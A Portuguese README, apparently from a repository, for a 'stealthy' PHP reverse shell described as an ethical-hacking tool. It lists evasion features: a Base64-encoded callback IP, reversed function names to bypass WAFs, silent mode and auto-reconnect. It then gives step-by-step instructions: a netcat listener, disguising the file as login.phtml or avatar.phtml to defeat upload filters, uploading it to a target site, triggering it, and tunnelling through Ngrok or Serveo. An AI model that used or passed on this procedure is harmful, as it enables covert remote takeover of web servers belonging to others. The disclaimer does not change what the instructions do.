
Este é um poderoso e furtivo PHP reverse shell projetado para ethical hacking e testes de penetração. Ele estabelece uma conexão confiável e silenciosa de volta para sua máquina.
Esta é uma shell reversa PHP poderosa e furtiva, projetada para testes de penetração e hacking ético. Ela estabelece uma conexão confiável e silenciosa de volta à sua máquina.
Esta shell reversa PHP foi desenvolvida estritamente para fins educacionais e de teste de penetração autorizado.
O desenvolvedor não se responsabiliza por qualquer uso indevido, dano ou atividade ilegal realizada com esta reverse_shell.
Use com responsabilidade e apenas em sistemas que você possui ou tem permissão explícita para testar. O acesso não autorizado é ilegal e punível por lei.
IP e comando shell são codificados em Base64 para furtividade
Nomes de funções são invertidos para contornar WAF e filtros de segurança
Modo silencioso — nenhuma saída exibida para evitar detecção
Reconecta automaticamente se a conexão cair
Pode ser executado como daemon em segundo plano (se o servidor suportar)
Funciona na maioria dos servidores com PHP habilitado
Suporta serviços de tunelamento como Ngrok, Serveo
Faça upload com extensão .phtml para contornar alguns filtros
1. Inicie um listener na sua máquina
nc -lvnp 4444
2. Codifique seu IP ou hostname em Base64
Use este comando simples:
echo "seu_ip_ou_hostname" | base64
Exemplo:
echo "192.168.1.5" | base64
Copie a saída e substitua o valor $ip_b64 no script da shell reversa PHP.
3. Atualize seu script de shell reversa PHP:
Altere estas linhas com seu IP/hostname codificado em Base64 e porta:
$ip_b64 = 'SEU_IP_OU_HOSTNAME_CODIFICADO_EM_BASE64';
$port = SUA_PORTA_DO_LISTENER;
4. Renomeie o arquivo e faça upload
Renomeie o arquivo para algo menos suspeito, por exemplo:
login.phtml
avatar.phtml
update.phtml
Usar a extensão .phtml ajuda o arquivo a ser executado em alguns servidores que bloqueiam .php.
Faça upload deste arquivo no site alvo onde uploads são permitidos.
5. Dispare a shell reversa
Abra o arquivo enviado em um navegador:
http://target.com/uploads/login.phtml
Uma vez aberto, seu listener receberá uma conexão de shell reversa.
Se você está usando dados móveis ou atrás de um roteador (NAT), seu IP pode não ser público. Nesse caso, a shell reversa não consegue alcançar sua máquina diretamente.
Para corrigir isso, use ferramentas de tunelamento TCP como Ngrok ou Serveo.
Instale o Ngrok
Execute este comando:
ngrok tcp 4444
Ele exibirá algo como:
Forwarding tcp://4.tcp.ngrok.io:18900
Atualize seu script de shell reversa PHP:
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;
Inicie seu listener:
nc -lvnp 4444
Execute este comando:
ssh -R 0:localhost:4444 serveo.net
Ele dirá algo como:
Forwarding TCP connections from serveo.net:46603
Atualize seu script de shell reversa PHP:
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;
Inicie seu listener:
nc -lvnp 4444
Este projeto está licenciado sob a GNU General Public License v3.0